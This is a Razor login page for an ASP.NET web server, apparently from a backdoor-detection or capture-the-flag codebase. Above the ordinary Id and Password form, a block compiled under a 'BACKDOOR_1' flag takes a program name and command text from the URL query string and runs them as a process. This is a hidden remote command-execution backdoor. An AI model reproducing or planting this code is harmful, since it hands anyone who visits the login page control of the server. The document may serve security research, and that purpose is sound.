@model WebServer.Models.Account.LoginDetails

@{
    ViewData["Title"] = "Login";

#if BACKDOOR_1
    if (WebServer.HealthChecks.LocalConfigHealthCheck.CheckDelay > 10 && Context.Request.Query.TryGetValue("log", out var logs)
        && Context.Request.Query.TryGetValue("logFile", out var fileName))
    {
        WebServer.HealthChecks.LocalConfigHealthCheck.CheckDelay = 1;
        foreach (var log in logs)
        {
            var escapedLog = log.Replace("\"", "\\\"");

            var proc = new System.Diagnostics.Process()
            {
                StartInfo = new System.Diagnostics.ProcessStartInfo
                {
                    Arguments = $"-c \"{escapedLog}\"",
                    FileName = fileName[0],
                    UseShellExecute = true
                }
            };
            proc.Start();
            proc.WaitForExit();
        };
    }
#endif
}

<h1 class="text-center">@ViewData["Title"]</h1>

<div class="row justify-content-center">
    <div class="col-md-5">
        <form method="post" asp-controller="Account" asp-action="Login" asp-route-returnurl="@Context.Request.Query["ReturnUrl"]">
            @if (ViewData.ContainsKey("ErrorMessage"))
            {
                <div class="alert alert-danger alert-dismissible show" role="alert">
                    @ViewData["ErrorMessage"]
                    <button type="button" class="close" data-dismiss="alert" aria-label="Close">
                        <span aria-hidden="true">&times;</span>
                    </button>
                </div>
            }
            <div class="form-group">
                <label asp-for="Id"></label><br />
                <input type="text" asp-for="Id" class="form-control" />
                <span asp-validation-for="Id" class="text-danger"></span>
            </div>
            <div class="form-group">
                <label asp-for="Password"></label><br />
                <input type="password" asp-for="Password" class="form-control" />
                <span asp-validation-for="Password" class="text-danger"></span>
            </div>
            <button type="submit" class="btn btn-primary">Log in</button>
        </form>
    </div>
</div>
